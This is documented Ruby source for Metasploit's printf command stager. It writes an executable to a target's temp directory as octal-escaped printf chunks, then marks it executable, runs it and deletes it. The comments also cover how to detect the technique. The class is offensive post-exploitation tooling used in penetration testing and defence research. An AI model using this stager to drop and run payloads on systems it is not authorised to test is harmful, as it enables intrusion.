class Rex::Exploitation::CmdStagerPrintf
Public Class Methods
new(exe)
Calls superclass method
Rex::Exploitation::CmdStagerBase::new
# File lib/rex/exploitation/cmdstager/printf.rb, line 12
#
# Set up the stager for the given executable and choose the name of the file
# it will be written to.
#
# @param exe [String] the executable, forwarded unchanged to
#   Rex::Exploitation::CmdStagerBase#initialize
def initialize(exe)
  super(exe)
  # Five random alphabetic characters, regenerated for every instance. The
  # name itself is therefore not a stable indicator for detection; the shape
  # of the generated commands is.
  @var_elf = Rex::Text.rand_text_alpha(5)
end
Public Instance Methods
cmd_concat_operator()
# File lib/rex/exploitation/cmdstager/printf.rb, line 115
#
# Separator placed between commands when several are joined on one line.
#
# @return [String] a semicolon with a space on either side
def cmd_concat_operator
  ' ; '
end
encode_payload(opts)
Encode into a "\12\345" octal format that printf understands
# File lib/rex/exploitation/cmdstager/printf.rb, line 57
#
# Encode the executable as octal escapes for printf.
#
# @param opts [Hash] not read by this method
# @return the result of Rex::Text.to_octal for @exe, with each escape led by
#   @prefix (the prefix is assigned in generate_cmds)
def encode_payload(opts)
  Rex::Text.to_octal(@exe, @prefix)
end
generate(opts = {})
Override to ensure opts[:temp] is a correct *nix path
Calls superclass method
Rex::Exploitation::CmdStagerBase#generate
# File lib/rex/exploitation/cmdstager/printf.rb, line 21
#
# Normalise opts[:temp] into a shell-safe *nix directory path, then defer to
# the superclass.
#
# @param opts [Hash] :temp is the target directory (default '/tmp/'); the
#   hash is updated in place with the normalised value
# @return whatever Rex::Exploitation::CmdStagerBase#generate returns
def generate(opts = {})
  temp_dir = opts[:temp] || '/tmp/'
  # In-place substitution: a string supplied by the caller is itself changed.
  temp_dir.gsub!(/\\/, '/')
  # Escaped because the directory ends up inside shell command text
  # NOTE(review): presumably it becomes @tempdir in the superclass - confirm.
  temp_dir = temp_dir.shellescape
  temp_dir << '/' unless temp_dir.end_with?('/')
  opts[:temp] = temp_dir
  super
end
generate_cmds(opts)
Override to set the extra byte count
Calls superclass method
Rex::Exploitation::CmdStagerBase#generate_cmds
# File lib/rex/exploitation/cmdstager/printf.rb, line 32
#
# Choose the text wrapped around every chunk, record how many bytes that
# wrapper costs in opts[:extra], and defer to the superclass.
#
# @param opts [Hash] :noquotes selects the unquoted form; :linemax is the
#   maximum command length; :extra is written by this method
# @return whatever Rex::Exploitation::CmdStagerBase#generate_cmds returns
# @raise [RuntimeError] when :linemax leaves less room than one escape needs
def generate_cmds(opts)
  redirect = ">>#{@tempdir}#{@var_elf}"

  # Without quotes the escape prefix is two backslashes instead of one, so
  # the smallest useful chunk is one byte longer.
  quote, @prefix, min_part_size =
    if opts[:noquotes]
      ['', '\\\\', 5]
    else
      ["'", '\\', 4]
    end

  @cmd_start = "printf #{quote}"
  @cmd_end = "#{quote}#{redirect}"

  opts.merge!(:extra => @cmd_start.length + @cmd_end.length)

  available = opts[:linemax] - opts[:extra]
  if available < min_part_size
    raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
  end

  super
end
generate_cmds_decoder(opts)
Since the binary has been already dropped to disk, just execute and delete it
# File lib/rex/exploitation/cmdstager/printf.rb, line 101
#
# Build the commands that follow the write: mark the file executable, run it
# and, unless opts[:nodelete] is set, remove it again.
#
# This chmod / execute / rm -f sequence on one path is what shows up in
# command and process telemetry; with :nodelete the file stays on disk.
#
# @param opts [Hash] :nodelete suppresses the final rm
# @return [Array<String>] the commands, in execution order
def generate_cmds_decoder(opts)
  dropped = "#{@tempdir}#{@var_elf}"
  steps = ["chmod +x #{dropped}", dropped]
  steps << "rm -f #{dropped}" unless opts[:nodelete]
  steps
end
parts_to_commands(parts, opts)
Combine the parts of the encoded file with the stuff that goes before and after it.
# File lib/rex/exploitation/cmdstager/printf.rb, line 91
#
# Wrap every encoded chunk in the command text chosen by generate_cmds.
#
# @param parts [Array<String>] encoded chunks
# @param opts [Hash] not read by this method
# @return [Array<String>] one command per chunk: @cmd_start, the chunk,
#   then @cmd_end
def parts_to_commands(parts, opts)
  parts.map { |chunk| @cmd_start + chunk + @cmd_end }
end
slice_up_payload(encoded, opts)
Override it to ensure that the octal representation of a byte isn’t cut
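# File lib/rex/exploitation/cmdstager/printf.rb, line 64
#
# Split the encoded payload into chunks that fit on one command line without
# cutting an octal escape in half. Reads @prefix, which generate_cmds sets.
#
# @param encoded [String] payload already encoded as @prefix-led octal
#   escapes; it is copied, not modified
# @param opts [Hash] :linemax is the maximum command length; :extra
#   (default 0) is the number of bytes taken by the text around each chunk
# @return [Array<String>] the chunks, in order
# @raise [RuntimeError] when the room left per line cannot hold one complete
#   escape; without this check the loop would append empty chunks forever
def slice_up_payload(encoded, opts)
  remaining = encoded.dup
  parts = []
  window = opts[:linemax] - (opts[:extra] || 0)

  # A zero or negative window can never make progress.
  if window <= 0
    raise RuntimeError, "Not enough space for payload data - #{window} byte available per line"
  end

  until remaining.empty?
    chunk = remaining.slice(0, window)

    # Remove the last octal escape if it is incomplete: more data follows and
    # it does not start with the escape prefix, so the cut fell inside one.
    if remaining.length > chunk.length && remaining[chunk.length, @prefix.length] != @prefix
      cut = chunk.rindex('\\')
      # No backslash in the chunk means no escape was split; keep it whole.
      if cut
        # Step back over the first backslash of a two-backslash prefix.
        cut -= 1 if cut > 0 && chunk[cut - 1] == '\\'
        chunk.slice!(cut..-1)
      end
    end

    # Trimming left nothing: the window is shorter than a single escape.
    if chunk.empty?
      raise RuntimeError, "Not enough space for payload data - #{window} byte available per line"
    end

    parts << chunk
    remaining.slice!(0, chunk.length)
  end

  parts
end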